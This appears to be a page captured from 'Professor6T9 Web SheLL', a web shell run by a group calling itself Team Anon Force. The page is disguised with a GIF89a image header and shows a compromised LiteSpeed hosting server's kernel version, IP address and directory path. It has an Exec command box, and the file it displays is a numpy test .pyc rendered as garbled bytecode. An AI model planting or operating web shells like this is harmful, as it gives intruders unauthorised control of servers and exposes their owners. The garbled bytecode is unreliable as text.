GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
numpy
/
distutils
/
tests
/
__pycache__
[ HOME ]
Exec
Submit
File Name : test_from_template.cpython-311.pyc
� � hO � �2 � d dl mZ d dlmZ dZdZd� Zd� ZdS )� )�process_str)�assert_equalz� python module foo <_rd=real,double precision> interface subroutine <s,d>foosub(tol) <_rd>, intent(in,out) :: tol end subroutine <s,d>foosub end interface end python module foo a# python module foo interface subroutine sfoosub(tol) real, intent(in,out) :: tol end subroutine sfoosub subroutine dfoosub(tol) double precision, intent(in,out) :: tol end subroutine dfoosub end interface end python module foo c �P � d� | � � � � � S )zu Remove leading and trailing whitespace, and convert internal stretches of whitespace to a single space. � )�join�split)�ss �{/builddir/build/BUILD/cloudlinux-venv-1.0.8/venv/lib64/python3.11/site-packages/numpy/distutils/tests/test_from_template.py�normalize_whitespacer s � � �8�8�A�G�G�I�I���� c � � t t � � } t | � � }t t � � }t ||� � dS )zRegression test for gh-10712.N)r �pyf_srcr �expected_pyfr )�pyf�normalized_pyf�normalized_expected_pyfs r �test_from_templater '